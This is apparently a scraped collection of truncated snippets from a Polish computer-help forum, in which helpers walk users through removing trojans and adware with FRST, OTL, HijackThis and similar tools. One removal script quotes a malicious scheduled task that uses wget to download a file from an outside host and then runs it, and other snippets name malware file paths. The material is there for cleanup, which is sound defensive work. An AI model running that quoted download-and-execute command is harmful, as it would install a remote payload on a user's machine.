To moze byc tez trojan, ale nie w tym przypadku. Przeciez widzisz, ze autor ma komputer od HP, a wiec ma i oprogramowanie SoftThinks, co widac np. tutaj: O23 - Service: PC Angel (PCA) - SoftThinks - C:\WINDOWS\SMINST\PCAngel.exe Wiec to nie trojan, a z takim podejsciem jak Twoje nalezaloby usunac wszystkie pliki, ktore moga byc trojanami...
Tak mozesz usunac ten folder. Log wyglada ok.
Otwórz notatnik systemowy i wklej: CloseProcesses: Task: {22FB8DC2-D795-43DF-9398-5A71A4D5E4F1} - System32\Tasks\Origin => C:\Users\Norbi\AppData\Roaming\Origin\up... Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze. Uruchom jako administrator FRST i kliknij w Fix.
Nadal tworza sie jakies szkodliwe pliki. Wykonaj kolejny Fixlist.txt dla FRST: CloseProcesses: AlternateDataStreams: C:\Windows\system32\Drivers\iadyetai.sys... [598] AlternateDataStreams: C:\Windows\system32\Drivers\mrjflcxj.sys... [298] C:\Windows\system32\Drivers\iadyetai.sys C:\Windows\system32\Drivers\mrjflcxj.sys S1 fjzfhzry; \??\C:\Windows\system32\drivers\fjzfhzry...
AVG- nie da rady Avast - tylko go nie pobieraj nawet Standardowo wystarczy: https://downloads.malwarebytes.com/file/... https://www.eset.com/pl/home/online-scan... https://www.instalki.pl/download/program... Potem wszystkie aktualizacje i restarty systemu wymagane. Usuń: CCleaner SyncTrayzor
Uruchom komputer w trybie awaryjnym i zobacz czy wtedy bedzie mozna go usunac. -------------------- Jezeli masz Windows 95/98 to uruchm komputer w trybie msdos i usun plik lsd_f3.dll Windows\System\iesprt.sys lub Windows\system\timestamp.sys Pozniej poczytatj tutaj i usun zmiany z rejestru, ktore wprowadzil trojan: http://securityresponse.symantec.com/avc...
Wszystko jest ok, nie masz infekcji, probujesz usunac proces systemowy i na sile zepsuc system, dlatego pojawia sie BS.
Pobierz Farbar Recovery Scan Tool http://www.bleepingcomputer.com/download... zgodny z wersją systemu 32-bit lub 64-bit. Uruchom FRST i kliknij "Scan". Wstaw raport FRST i Addition jako załączniki.
Jeśli chodzi o typy infekcji to dotyczą one trojanów - Wacatac.B!ml oraz Ursnif!ml. Zdarza się, że Wacatac i Ursnif zostają wykrywane nieprawidłowo w wielu plikach, nawet tych wiarygodnych...
Odinstaluj: Avast Cleanup Premium (HKLM\...\Avast Cleanup) (Version: 23.3.15198.14860 - Avast Software) CCleaner (HKLM\...\CCleaner) (Version: 6.17 - Piriform) CCleaner Browser (HKLM-x32\...\CCleaner Browser) (Version: 118.0.22914.118 - Autorzy CCleaner Browser) Wykonaj Fixlist.txt dla FRST: CloseProcesses: C:\Users\Lenovo\AppData\Roaming\Launcher...
Odinstaluj PriceFountain, Qtrax Player. Otwórz notatnik systemowy i wklej: Task: {214C3965-5A00-4B88-BDB7-D1C48573ABF9} - System32\Tasks\PiotrekSnookerScroogeV2 => Rundll32.exe KoranBacchanal.dll,main 7 1 <==== UWAGA Task: {3C62982E-E4DF-4B8B-9A1A-886F15FCD192} - System32\Tasks\{4CEEF0CB-3E70-6F50-0015-... => C:\Users\Piotrek\AppData\Roaming\PriceFo...
Wejdz do C:\Users\mateusz\Downloads\ utworz plik fixlist.txt, wklej do niego to co podalem. Uruchom FRST i nacisnij Fix. Sprobuj uzyc AdwCleaner w trybie awaryjnym.
Własne opcje skanowania / skrypt i wklej :OTL SRV - File not found Wykonaj skrypt: Mnie by zastanawiało, co to jest ? DRV - Był wcześniej instalowany Firewall Ashampoo? By potwierdzały wpisy: O10 - Protocol_Catalog9\Catalog_Entries\000000... - E:\programy\Ashampoo\Ashampoo FireWall FREE\spi.dll () O10 - Protocol_Catalog9\Catalog_Entries\000000...
Pokaż te logi jako załączniki lub wrzuć na wklej.org
Miales dwa pliki smss.exe, jeden falszywy juz usuniety, a drugi to plik systemowy i zostaw go w spokoju!
Nie, to zwykly spam. Co do tego pliku, to pewnie wchodzisz na jakas zainfekowana strone przez IE i dlatego sie tworzy.
Poczytaj post http://www.elektroda.pl/rtvforum/topic14... i zastosuj się do załączonych tam rad. Poczytaj również http://www.searchengines.pl/phpbb203/ind... o trojanach HackerDefender bo to może być coś z tej "półki". Dobrze tez zernknąć na http://www.searchengines.pl/phpbb203/ind... Na przyszłość zabezpiecz...
A co już robiłes ??? MAsz jakieś programy ... czytałeś na googlach ?? albo w elektrodzie ?? Dodano po 44 http://www.kaspersky.pl/services.html?s=...
:arrow: reb Wklej log z hijackthis.
O danych mozesz zapomniec o ile nie masz kopi zapasowej na innym nosniku. Niczego nie odszyfrujesz, o ile kiedys nie wycieknie klucz, co jest raczej watpliwe. Odinstaluj: Trojan Remover Wykonaj Fixlist.txt dla FRST: CloseProcesses: Toolbar: HKU\S-1-5-21-3844030858-2149473374-36646... -> Brak nazwy - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -...
Wyglada ok, usun jeszcze katalogi kosza ze wszystkich dyskow (usuwaj z shiftem). Katalogi kosza to Recycler lub Recycled.
Wylacz przegladarke i dopiero usuwaj w mbam albo usun recznie dwa podane na screenie pliki. Te wszystkie Temp* tez mozesz usunac.
Do aktualizacji: Mozilla Firefox 6.0.2 (x86 pl) Zrob skan przy pomocy mbam oraz cureit. Zmien recznie w Chrome wyszukiwarke na Google. Wykonaj skrypt w OTL: :OTL IE - HKU\S-1-5-21-1715567821-1935655697-14170... Explorer\Main,Start Page = http://www.ask.com/?l=dis&o=1586&gct=hp IE - HKU\S-1-5-21-1715567821-1935655697-14170...
Fixlist.txt: C:\ProgramData\KMSAuto\ EmptyTemp:
Nie pobieraj programow ze stron oferujacych wlasne menadzery pobierania, ktore instaluja szkodliwe aplikacje. Pobieraj TYLKO z bezposrednich linkow. Nie mowiac juz o pobieraniu zainfekowanych aktywatorow... Odinstaluj: Spybot - Search & Destroy Obok frst.exe utworz plik Fixlist.txt z zawartoscia: CloseProcesses: Task: {C34D6763-9DFC-4403-8E48-56B373B62B59}.....
Skasuj folder C:\FRST
http://kasowac.removepcvirusthreats.com/...
Trzeba rozkrecic laptopa i wyczyscic radiator oraz wentylator (w razie koniecznosci wymienic) ale raczej powinno wystarczyc wyczyszczenie i ewentualna wymiana pasty. Mozesz oddac do serwisu i powinni Ci to zrobic (jezeli jest na gwarancji to nawet musisz oddac).
Wyglada ok.
Napisz tez nazwe zainfekowanego pliku oraz jego lokalizacje.
Tyle wystarczy, prosilem o sama sekcje Detected. Wpisz w Start->Uruchom: sc stop cdralw sc stop eth8023 sc delete cdralw sc delete eth8023 Reszta jest juz ok.
W hijackthis usun: R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file) O3 - Toolbar: (no name) - {4E7BD74F-2B8D-469E-CCB0-B130EEDBE97C} - (no file)...
Nie ma wirusa o nazwie Trojan. Wirus jest jednym rodzajem szkodników, a trojan jest innym rodzajem. Powiedz, skąd Ci się wzięło, że masz wirusa trojana? Ty masz pełno spyware'u i adware'u (też szkodliwe). Jeżeli masz Windows 2000 lub XP to ściągnij sobie ze strony mmm.microsoft.com program Antispyware i go zainstaluj oraz uruchom. Jak Ci wytnie te wszystkie...
NetBus po zainstalowaniu, tworzy swoje wpisy w rejestrze [HKEY_LOCAL_MACHINE\Software\Microsoft\W... a także tworzy plik patch.ini w katalogu C:\windows. Aby się go pozbyć, wystarczy usunąć owy wpis w rejestrze, lub użyć programiku BuSJack (http://www.zoom.idg.pl/ftp/pc_512/BusJa... który zrobi to za nas. Opis za...
Pozwol zeby plik sie utworzyl, nastepnie sprawdz go na jotti i wklej wynik na forum.
Sciagnij sobie killbox i usun ten plik przy jego pomocy, zaznacz opcje delete on reboot i po resecie juz go nie powinno byc.
Skrypt usuwal szkodliwa usluge + plik. Reszte smieci usunal combofix. Mozesz juz usunac combofix, avengera + zbedne katalogi utworzone przez te programy: C:\Deckard, C:\qoobox, C:\ComboFix
Otwórz notatnik i wklej zawartość: HKU\S-1-5-21-3515840015-1859624020-40533... Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp CHR HKLM-x32\...\Chrome\Extension: Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe. Uruchom FRST i kliknij w Fix/Napraw.
Otwórz Notatnik i wklej: HKU\S-1-5-21-2052111302-861567501-180167... Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze. Uruchom FRST i kliknij w Fix.
Zaloguj sie do routera i sprawdz czy tam tez masz ustawiony dns: 54.186.138.8, jezeli tak to masz zainfekowany router. W takim wypadku bedziesz musial zmienic w ustawieniach routera dnsy na takie jakie zaleca dostawca oraz zablokowac dostep do routera z internetu: http://www.tp-link.com.pl/article/?faqid... Jezeli w ustawieniach routera dnsy sa poprawne...
Skoro antyvirus Ci go wykrywa to chyba jest tam opcja usun? Mozesz go tez usunac killboxem tak jak wczesniej, wklejasz do niego: C:\Windows\System32.exe
Otwórz Notatnik i wklej: Task: {42687F7A-2475-4E68-A93E-8E8BD4758522} - System32\Tasks\Digital Sites => C:\Users\Edytka\AppData\Roaming\DIGITA~1... <==== ATTENTION Task: {F0DC023E-450A-422C-8E21-D753492E94BB} - \FoxTab No Task File <==== ATTENTION HKU\S-1-5-21-2104063108-1508775239-35498... Plik zapisz pod...
Na chwile obecna nie ma mozliwosci odzszyfrowania plikow, moze kiedys wyciekna klucze i wtedy bedzie to mozliwe, ale na razie zapomnij. W sysemie nie widze aktywnej infekcji, mozliwe, ze tylko sie uruchomila i zaszyfrowala pliki.
Otwórz notatnik systemowy i wklej: HKU\S-1-5-21-1935655697-1326574676-16069... exefile => "%1" %* <===== ATTENTION! HKU\S-1-5-21-1935655697-1326574676-16069... "%1" %* <===== ATTENTION! SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes:...
Odinstaluj: qone8 Browser Protecter (HKLM\...\qone8 Browser Protecter) (Version: - qone8) <==== ATTENTION SiteFinder (HKLM\...\SiteFinder) (Version: 1.0.0.0 - SiteFinder) <==== ATTENTION Daj jeszcze raz frst.txt, tym razem caly. W razie problemow wykonaj ponownie skanowanie.
Otwórz notatnik systemowy i wklej: Task: {2CEBA0F3-0D91-41C6-9271-1D649039BFB0} - System32\Tasks\Open Chrome => Chrome.exe --new-window toolbar.avg.com/ch-uninstall?cid={DCAB5A...
Po użyciu AdwareCleanera pokaż logi z OTL http://oldtimer.geekstogo.com/OTL.exe http://obrazki.elektroda.pl/4338219300_1...
Uruchom OTL i w okno (Własne opcje skanowania/Script)wklej: :OTL DRV - File not found Kliknij Wykonaj skrypt. W OTL użyj opcji Sprzątanie.
Podaj nazwe pliku oraz jego lokalizacje na dysku. Log z Hijackthis jest bezuzyteczny. Nie trzeba sie specjalnie znac zeby przeczytac podwieszony watek, zrobic skan tym co jest tam podane i dac wymagane logi. Zrob skan przy pomocy mbam oraz cureit. Daj w zalaczniku oba logi z OTL.
W porządku .Odinstaluj Avirę.Wskazane aktualizacje:Service Pack 2,Javy do wersji 23,Adobe Reader do wersji X.Przeskanuj jeszcze programem Malwarebytes AntiMalware.
Uruchom OTL i w okno (Własne opcje skanowania/Script)wklej: :OTL DRV - File not found Kliknij w Wykonaj Skrypt.Zatwierdź restart komputera. Zapisz raport, który pokaże się po restarcie. Następnie uruchom OTL ponownie, tym razem kliknij (Skanuj). Pokaż nowy log OTL.txt oraz raport z usuwania.
Po wykonaniu tego co napisałem wybierz w OTL "Sprzątanie" i to wszystko.
Uzyj Avenger: http://cybertrash.pl/images/tata/Avenger... Wklej do niego taki skrypt: Files to delete: C:\d6fagcs8.cmd C:\0hct8ybw.bat C:\3wcxx91.cmd C:\x.com C:\188qsm.bat C:\2ifetri.cmd C:\i.cmd C:\h.cmd C:\ylr.exe C:\awda2.exe C:\autorun.inf J:\awda2.exe J:\Autorun.inf Registry keys to delete: HKEY_CURRENT_USER\software\microsoft\win...
:arrow: kpitan Po co? W ostatnich log'ach widac, ze nic juz nie zostalo.
Dales nie ten log z combofix co trzeba, daj C:\ComboFix.txt Usun to co znalazl antywirus do tego zrob skan przy pomocy SuperAntiSpyware.
Wklej log z hijackthis na poczatek. Tutaj masz program do usuwania: http://securityresponse.symantec.com/avc... Probowales go uzyc?
Popraw bledy typu "usuną". Nie pisz post pod postem, uzywaj ZMIEN. Odinstaluj: mks vir 9 demo i wiecej nie instaluj takich badziewi. Sciagnij na innym komputerze cureit livecd, nagraj na cd i przeskanuj caly dysk. Mozesz tez probowac uruchomic zwykla wersje. abp470n5 <- Masz wirusa sality, ktory infekuje pliki exe. Wykonaj skan + naprawe trybu awaryjnego:...
Odinstaluj: WindowsMangerProtect20.0.0.722 Fixlist.txt dla FRST: HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-page.com/web/?type=ds&t... HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-page.com/web/?type=ds&t...
Uruchom OTL i w okno (Własne opcje skanowania/Script)wklej: :OTL O4 - HKU\S-1-5-21-251601867-2234092392-348682... Kliknij Wykonaj skrypt. W OTL użyj opcji Sprzątanie.
Odinstaluj: Google Toolbar for Internet Explorer MyFreeCodec Winamp Toolbar Wykonaj skrypt w OTL: :OTL IE - HKU\S-1-5-21-1714442087-1699737439-57555... "URL" = http://search.aol.pl/aol/search?s_it=tb5... IE - HKU\S-1-5-21-1714442087-1699737439-57555...
Uruchom OTL i w okno (Własne opcje skanowania/Script)wklej: :OTL O4 - HKLM..\Run: Kliknij Wykonaj skrypt.W OTL użyj opcji Sprzątanie. W AdwCleaner użyj opcji Odinstaluj.
Pierwszy zapewne wykrywa jakies bzdury, do tego instaluje szkodliwy pasek. Drugi jest dziurawy i umozliwia infekcje komputera.
Użyj programu CureIT http://www.freedrweb.com/cureit/?lng=pl
Wykonaj skrypt w OTL: :OTL IE - HKCU\..\SearchScopes\{043C5167-00BB-4324... "URL" = http://vshare.toolbarhome.com/search.asp... FF - prefs.js..extensions.enabledItems: vshare(at)toolbar:1.0.0 FF - prefs.js..extensions.enabledItems: mil(at)toolbar:1.0.0
http://malwaretips.com/blogs/lyrmix-remo... Dodatkowo przeskanuj i napraw:"ADWcleaner","MalwarebytesAntiMal...
Wykonaj w trybie awaryjnym.
Usun w hijackthis te wpisy: O2 - BHO: (no name) - {00000000-0000-0000-0000-000000000000} - (no file) O2 - BHO: (no name) - {11111111-2222-408A-9842-CDBE1C6D37EB} - C:\WINDOWS\netdde.dll <- usun plik O2 - BHO: (no name) - {16875E09-927B-4494-82BD-158A1CD46BA0} - C:\WINDOWS\system32\prflbmsgp32.dll <- usun plik O2 - BHO: C:\WINDOWS\system32\st3.dll...
w OTL masz na dole pole gdzie wklejasz skrypt podany przez użytkownika Kolobos, po czym wciskasz magiczny przycisk "Wykonaj skrypt".
Zrob jeszcze pelny skan przy pomocy cureit i usun infekcje. Po wykonaniu daj log z combofix.
Uruchom OTL i w oknie Custom Scans/Fixes wklej to: :OTL O33 - MountPoints2\{cfd7e485-b720-11de-b19f-00... - "" = F:\curice\elena.exe -- File not found O33 - MountPoints2\{cfd7e485-b720-11de-b19f-00... - "" = F:\curice\elena.exe -- File not found O33 - MountPoints2\{cfd7e485-b720-11de-b19f-00...
Zrob skan przy pomocy Dr.Web Cureit oraz Malwarebytes Anti-Malware. Daj w zalaczniku log z combofix. Podaj w jakim dokladnie pliku znajdowal sie trojan i gdzie ten plik sie znajdowal na dysku.
Ciastka -> Adware.Tracking Cookie i tak sie utworza nowe. Wylacz na chwile przywracanie systemu, wtedy zniknie Adware.Vundo Variant.
Usluga do kasacji: O23 - Service: Windows Service Manager (WSCM) - Unknown owner - C:\WINDOWS\System32\service.exe Usuwasz tak: Start->Uruchom->sc stop WSCM oraz: sc delete WSCM Plik C:\WINDOWS\System32\service.exe usun z dysku, tylko nie pomyl z services.exe Pliki win64.exe oraz win16.exe usun przy pomocy killbox'a (znajdziesz na google) z zaznaczona...
Witam :sm9: Spróbuj Avast :sm28: http://www.avast.com/eng/down_home.html Kilkakrotnie uratował moj komputer od trojanów Wyrzuciłem IE i Outloka i pracuję na pakiecie Mozilla. Jeśli nie będzie mógł go wyleczyć to daj do kwarantanny lub usuń plik. Avast wymaga rejestracji i otrzymujesz na 14 m-cy kod. Pozdro 8)
Odinstaluj Adobe Reader 9, HD Cinema Pro 1.8cV23.04, istartsurf uninstall, Microsoft Excel Packages, SmartWeb. Pobierz i uruchom jako administrator AdwCleaner https://toolslib.net/downloads/finish/1/ Kliknij Scan i później Cleaning. Pokaż nowe logi z FRST.
ewido i spy sweeper odinstaluj. Czy winlogon.exe dalej jest zainfekowany? Jezeli tak to uruchom konsole odzyskiwania z plyty instlacyjnej XP o tak: http://www.searchengines.pl/phpbb203/ind... Usun zainfekowany plik winlogon.exe: del C:\WINDOWS\system32\winlogon.exe nastepnie wypakuj go z plyty: expand x:\i386\winlogon.ex_ C:\WINDOWS\system32\winlogon.exe...
Przeskanuj komputer programem adwcleaner, usuń wszystko. Następnie zainstaluj malwarebytes anty malware, przeskanuj komputer i usuń wszystko. Ściągnij program FRST, zrób skany i załącz je tutaj.
Odinstaluj: ASUS WebStorage Sync Agent Obok frst.exe utworz plik fixlist.txt z zawartoscia: Task: {57EE36C9-3F48-452C-8F1B-A09206A4AE05} - \Installer_iwebar No Task File <==== ATTENTION Task: {D2953D5E-C972-4E0A-8F9C-DA5063A440BE} - System32\Tasks\Installer_sense => C:\Users\Mikołaj\AppData\Local\Installer... [2014-12-28]...
Usuń to co znalazły programy i pokaż nowe logi z FRST jako załączniki lub raporty umieść na http://wklej.org/ i podaj link.
Obok frst.exe utworz plik fixlist.txt z zawartoscia: GroupPolicy: Group Policy on Chrome detected <======= ATTENTION SearchScopes: HKLM - DefaultScope value is missing. SearchScopes: HKCU - 516B9EDC029E4129A6C1E97AF25BE8E9 URL = http://search.delta-homes.com/web/?utm_s...
Otwórz notatnik systemowy i wklej: HKLM\SOFTWARE\Policies\Microsoft\Interne... Explorer: Policy restriction <======= ATTENTION HKU\S-1-5-21-2231891817-92612249-3282335... Explorer: Policy restriction <======= ATTENTION FF Extension: Zoom It - C:\Users\Hosse\AppData\Roaming\Mozilla\F...
Wykonaj skrypt: :OTL IE - HKU\S-1-5-21-65817511-2009588810-3967907... "URL" = http://search.v9.com/web/?q={searchTerms... [2013/10/18 14:52:16 | 000,001,614 | ---- | M] () -- C:\Users\Svartetta\AppData\Roaming\mozil...
Uruchom OTL i w okno (Własne opcje skanowania/Script)wklej: :OTL DRV - File not found Kliknij Wykonaj skrypt.W OTL użyj opcji Sprzątanie. Zainstaluj aktualizacje do programow wskazanych przez Security Check http://forum.dobreprogramy.pl/analiza-de... jako out of date.
Uruchom OTL i w okno (Własne opcje skanowania/Script)wklej: :OTL O3: 64bit: - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found. O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found. O4 - HKCU..\Run: Kliknij Wykonaj skrypt.W OTL użyj opcji Sprzątanie. W AdwCleaner użyj opcji Odinstaluj.
Odinstaluj piracka wersje nod'a i zainstaluj Comodo IS. Nie uzywaj IE. Zrob tez skan przy pomocy Dr.Web CureIt oraz Malwarebytes Anti-Malware. Utworz na pulpicie plik CFScript.txt, wklej do niego: Folder:: C:\Deckard d:\program files\Spyware Process Detector\ File:: c:\windows\system32\wmpns.dll c:\windows\system32\eq32.dll c:\windows\system32\drivers\CAMTHWDM.sys...
Zapomniales o sdfix. Utworz na pulpicie plik CFScript.txt i wklej do niego: File:: C:\WINDOWS\system32\dfqnabib.exe C:\WINDOWS\system32\lpmxajkl.exe C:\WINDOWS\system32\smdsbsrv.sys C:\WINDOWS\system32\snfybbyt.sys C:\WINDOWS\system32\tjfyabyt.exe C:\WINDOWS\system32\zsdjabmp.exe C:\WINDOWS\system32\mndsgsrv.dll C:\WINDOWS\system32\skqncbib.dll Registry::...
Wylacz na chwile przywracanie systemu. Zapewne znowu zainfekowales system z pendrive'a lub przegapiles jakis plik na ktorejs z partycji. Poprzednia infekcja zostala usunieta. Podlacz zainfekowany pendrive zapewne G:\. Zrob nowy CFScript.txt: File:: C:\oufddh.exe D:\oufddh.exe E:\oufddh.exe G:\oufddh.exe G:\autorun.inf Registry:: [-HKEY_CURRENT_USER\software\microsoft\w...
Nie musisz wchodzić w tryb awaryjny Panel sterowanie --> system-->Przywracanie systemu --> i zaznaczasz wyłacz przywracania na wszystkich dyskach i klikasz ok Następnie uruchaniasz jeszcze raz komputer. Mój komputer --> dysk c: --> narzędzia opcje folderów --> widok -->pokaż ukryte pliki i foldery i klikasz ok następnie wchodzisz do folderów i kasujesz...
krzychoocpp :arrow: Dlaczego wprowadzasz tschooper w błąd ? Z Twojej listy "programy albo niebezpieczne, albo niepotrzebne" tylko wpis: C:\WINDOWS\TEMP\idd17.tmp.exe jest ewidentnym plikiem robactwa ! Reszta to całkiem bezpieczne programy ! Skąd masz pewność, że tschooper nie używa programu SOUNDMAN i jest mu on zbędny w autostarcie ? Między niebezpieczne...
Falszywy alarm.
Wklej log programu HijackThis. Program znajdziesz na stronie majorgeeks.com oraz spychecker.com.
Zakoncz procesy: C:\PROGRA~1\wrvswsrw\GowCH0hN.exe C:\PROGRA~1\wrvswsrw\Nh0HCwoG.exe Usun caly katalog wrvswsrw W hijackthis usun: R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = c:\secure32.html R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = c:\secure32.html R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start...
Wyglada ok. Wykonaj tylko taki skrypt w OTL: :OTL O37 - HKU\S-1-5-21-561612749-4094949263-761090... [(at) = ComFile] -- Reg Error: Key error. File not found O37 - HKU\S-1-5-21-561612749-4094949263-761090... [(at) = exefile] -- Reg Error: Key error. File not found :Commands [emptytemp] Po wykonaniu wybierz w OTL sprzatanie.
Uzyj AdwCleaner, opcja Scan/Szukaj i Clean/Usun: http://www.bleepingcomputer.com/download... Zrob pelny skan przy pomocy Mbam i usun to co wykryje: http://www.bleepingcomputer.com/download... oraz http://ftp.drweb.com/pub/drweb/cureit/la...
Sciagnij hijackthis i wklej tu zawartosc loga, troche tych smieci pewnie masz, co zreszta widac po ikonach na pulpicie ;-) A co do mksa to nie moze usunac bo virus/trojan jest pewnie uruchomiony po jego zamknieciu w menadzerze zadan powinno sie dac go usunac.
Tak log jest juz ok. Ale pomysl o aktualizacjach (SP2 itd).
W oknie cmd wpisz: rd Window~1 albo zmien nazwe: ren Window~1 Win I wtedy bedziesz mogl normalnie usunac z poziomu explorera.
Otwórz notatnik systemowy i wklej: Task: {024D2B1F-E3FD-4480-A24E-A137F47187DF} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=rNeUiHGSrv... & start cmd /R dat.bmp <====...
Otwórz notatnik systemowy i wklej: ShellIconOverlayIdentifiers: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze. Uruchom jako administrator FRST i kliknij w Fix. Przeskanuj programem Malwarebytes Anti-Malware https://www.malwarebytes.org/downloads/ Podczas instalacji usuń zaznaczenie przy Uruchom okres testowy Malwarebytes...
Otwórz notatnik systemowy i wklej: ShortcutTarget: LOLRecorder.lnk -> G:\Gry\League Of Legends\Powtórki\LOLReplay\LOLRecorder.e... (No File) FF Plugin: yaxmpb(at)yahoo.com/YahooActiveXPluginBr... -> C:\Program Files\Yahoo!\Common\npyaxmpb.dll No File FF HKLM\...\Firefox\Extensions: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST...
trojan usunac usunac immobilizer usunac usterki
pompa magnum zawór dwubarowy krups st500dm002 1bd142
włacznik zbliżeniowy basen pompa
Berlinett CM5100 - Uchwyt do urządzenia kuchennego TV SHARP - brak przycisku Input na pilocie Aquos